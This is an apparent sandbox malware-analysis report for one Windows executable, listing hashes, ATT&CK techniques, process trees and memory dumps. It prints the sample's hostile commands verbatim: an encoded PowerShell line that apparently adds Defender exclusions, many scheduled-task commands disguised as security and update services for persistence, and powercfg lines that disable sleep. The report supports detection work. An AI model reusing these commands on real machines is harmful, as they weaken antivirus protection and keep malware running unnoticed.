617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207

Analysis

max time kernel
200s
max time network
182s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
03/12/2022, 22:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
Size

910KB
MD5

d00632c5fb5a80b955e3903721a62356
SHA1

b085642b1cc779ee89211d84be0c0c1d5d919ca7
SHA256

617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207
SHA512

9b2a1b29e050ca596d7fdcf21e4be24e7f8e23b933a20995905bd85ec482e47478c948d820dc9d32db63b0131346916d4cc8b2d32e9081cba038cf33583f294f
SSDEEP

12288:B80wOZQAsR9xGi3D0231Hz4M8dhdL3nr1qxLgmegUZbYkg586aWHff:S7Fb91adr1qJ0gUZYB5O8f

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2340 set thread context of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2236	schtasks.exe
940	schtasks.exe
4076	schtasks.exe
4192	schtasks.exe
2824	schtasks.exe
1908	schtasks.exe
3492	schtasks.exe
3432	schtasks.exe
4488	schtasks.exe
4588	schtasks.exe
3732	schtasks.exe
1228	schtasks.exe
664	schtasks.exe
4552	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
Token: SeDebugPrivilege	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeShutdownPrivilege	3652	powercfg.exe
Token: SeCreatePagefilePrivilege	3652	powercfg.exe
Token: SeShutdownPrivilege	2640	powercfg.exe
Token: SeCreatePagefilePrivilege	2640	powercfg.exe
Token: SeShutdownPrivilege	4500	powercfg.exe
Token: SeCreatePagefilePrivilege	4500	powercfg.exe
Token: SeShutdownPrivilege	4164	powercfg.exe
Token: SeCreatePagefilePrivilege	4164	powercfg.exe
Token: SeShutdownPrivilege	4896	powercfg.exe
Token: SeCreatePagefilePrivilege	4896	powercfg.exe
Token: SeShutdownPrivilege	4896	powercfg.exe
Token: SeCreatePagefilePrivilege	4896	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2340 wrote to memory of 2500	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	66
PID 2340 wrote to memory of 2500	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	66
PID 2340 wrote to memory of 2500	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	66
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 2340 wrote to memory of 4460	2340	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	67
PID 4460 wrote to memory of 748	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	69
PID 4460 wrote to memory of 748	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	69
PID 4460 wrote to memory of 748	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	69
PID 748 wrote to memory of 3584	748	cmd.exe	71
PID 748 wrote to memory of 3584	748	cmd.exe	71
PID 748 wrote to memory of 3584	748	cmd.exe	71
PID 4460 wrote to memory of 4964	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	73
PID 4460 wrote to memory of 4964	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	73
PID 4460 wrote to memory of 4964	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	73
PID 4460 wrote to memory of 4336	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	72
PID 4460 wrote to memory of 4336	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	72
PID 4460 wrote to memory of 4336	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	72
PID 4460 wrote to memory of 4648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	74
PID 4460 wrote to memory of 4648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	74
PID 4460 wrote to memory of 4648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	74
PID 4460 wrote to memory of 4468	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	75
PID 4460 wrote to memory of 4468	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	75
PID 4460 wrote to memory of 4468	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	75
PID 4460 wrote to memory of 1776	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	76
PID 4460 wrote to memory of 1776	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	76
PID 4460 wrote to memory of 1776	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	76
PID 4460 wrote to memory of 648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	83
PID 4460 wrote to memory of 648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	83
PID 4460 wrote to memory of 648	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	83
PID 4460 wrote to memory of 516	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	78
PID 4460 wrote to memory of 516	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	78
PID 4460 wrote to memory of 516	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	78
PID 4460 wrote to memory of 1184	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	82
PID 4460 wrote to memory of 1184	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	82
PID 4460 wrote to memory of 1184	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	82
PID 4460 wrote to memory of 32	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	80
PID 4460 wrote to memory of 32	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	80
PID 4460 wrote to memory of 32	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	80
PID 4460 wrote to memory of 2228	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	84
PID 4460 wrote to memory of 2228	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	84
PID 4460 wrote to memory of 2228	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	84
PID 4460 wrote to memory of 2136	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	89
PID 4460 wrote to memory of 2136	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	89
PID 4460 wrote to memory of 2136	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	89
PID 4460 wrote to memory of 1488	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	87
PID 4460 wrote to memory of 1488	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	87
PID 4460 wrote to memory of 1488	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	87
PID 4460 wrote to memory of 1744	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	91
PID 4460 wrote to memory of 1744	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	91
PID 4460 wrote to memory of 1744	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	91
PID 4460 wrote to memory of 2096	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	93
PID 4460 wrote to memory of 2096	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	93
PID 4460 wrote to memory of 2096	4460	617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe	93
PID 2096 wrote to memory of 3652	2096	cmd.exe	101
PID 2096 wrote to memory of 3652	2096	cmd.exe	101
PID 2096 wrote to memory of 3652	2096	cmd.exe	101
PID 4648 wrote to memory of 3432	4648	cmd.exe	114
PID 4648 wrote to memory of 3432	4648	cmd.exe	114

C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
"C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2340
- C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
  "C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe"
  2⤵
  PID:2500
- C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe
  "C:\Users\Admin\AppData\Local\Temp\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAFoAawA0AGEAUQBDADAAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADgAQQBBAFgAZwBtAEYAYQAzADYAQQAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAzAFoAZwBuAGQAbgBDAE8ARwAwADQAIwA+ACAAQAAoACAAPAAjAHoARwBpAHMAYQBoAEwAdgBGADgAWAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQwB0AFMAaQB5AHoANABrACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBoAHIAZwAzAEMAegBIAFMAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBKAEcAaQBKAEwAdgBMACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:748
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAFoAawA0AGEAUQBDADAAcgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADgAQQBBAFgAZwBtAEYAYQAzADYAQQAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAzAFoAZwBuAGQAbgBDAE8ARwAwADQAIwA+ACAAQAAoACAAPAAjAHoARwBpAHMAYQBoAEwAdgBGADgAWAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQwB0AFMAaQB5AHoANABrACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBoAHIAZwAzAEMAegBIAFMAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBKAEcAaQBKAEwAdgBMACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3584
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo кфyАSьlюЦзmW & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:4336
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4192
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ХШуwДbжбм9UJoЯбoO & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo g0йдl
    3⤵
    PID:4964
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo WkGЕКmYьKчЪdMZSGYv & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo РжOЩГWЬXрешЪSm
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4648
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3432
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ПИuтРЮB & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo LуdO0яXйvЭэqJiH
    3⤵
    PID:4468
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo YГмКyюЫ9Я & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo нWmчKтэАcMКhщтDdVД
    3⤵
    PID:1776
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2236
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 0fИчQDБнv & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЧШМХьчY
    3⤵
    PID:516
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo MД2yьь2ж1OЮp1кDsъ & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_3эu0Mн" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo дi4sМЧWXS
    3⤵
    PID:32
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_3эu0Mн" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo z1CH5оE & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo jзDрОJбуяУюcЬ
    3⤵
    PID:1184
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3732
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ТmЩммNlK4ыщжн & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 9saX9рС
    3⤵
    PID:648
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:940
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo NЪ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_ЖуD0s" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo оКЫBIеw0хNсОыОьiжБ
    3⤵
    PID:2228
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_ЖуD0s" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2824
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo BЫbоПСа & SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_ЮdHШ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ОчВШд1vzUНщkxФфВ
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_ЮdHШ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3492
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 6VаьjYЖNOZ & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_2ЙIXЛсШЫwаКкШjдCтЧ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ФЫFЛчеcfКЩ
    3⤵
    PID:2136
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_2ЙIXЛсШЫwаКкШjдCтЧ" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo дdeЗYЭуvzмауЧцъf2 & SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo эBXSлsФh4щсmdRpVDКБ
    3⤵
    PID:1744
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo УRо4тщс1K & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo fЙФфyжHяXяшВiаувъvЗ
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3652
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2640
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4500
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4164
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4896
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:664

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\617eb8fd49eb9249fac0985a70d28a639e2da4306b43ece3d253132753e6b207.exe.log

Filesize
1KB

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
memory/2340-151-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-129-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-139-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-141-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-140-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-142-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-143-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-144-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-145-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-146-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-147-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-148-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-149-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-150-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-120-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-152-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-153-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-154-0x0000000000ED0000-0x0000000000FBA000-memory.dmp

Filesize
936KB

Download
memory/2340-156-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-155-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-157-0x0000000005D50000-0x000000000624E000-memory.dmp

Filesize
5.0MB

Download
memory/2340-158-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-159-0x0000000005850000-0x00000000058E2000-memory.dmp

Filesize
584KB

Download
memory/2340-161-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-160-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-162-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-163-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-164-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-167-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-166-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-168-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-165-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-169-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-170-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-171-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-172-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-173-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-174-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-175-0x00000000057F0000-0x00000000057FA000-memory.dmp

Filesize
40KB

Download
memory/2340-176-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-177-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-179-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-178-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-180-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-181-0x00000000057B0000-0x00000000057C6000-memory.dmp

Filesize
88KB

Download
memory/2340-182-0x0000000005800000-0x000000000580E000-memory.dmp

Filesize
56KB

Download
memory/2340-183-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-184-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-185-0x0000000006520000-0x00000000065AE000-memory.dmp

Filesize
568KB

Download
memory/2340-186-0x0000000006650000-0x00000000066EC000-memory.dmp

Filesize
624KB

Download
memory/2340-187-0x0000000006AB0000-0x0000000006D04000-memory.dmp

Filesize
2.3MB

Download
memory/2340-188-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-121-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-122-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-123-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-124-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-125-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-137-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-126-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

Download
memory/2340-136-0x0000000077540000-0x00000000776CE000-memory.dmp

Filesize
1.6MB

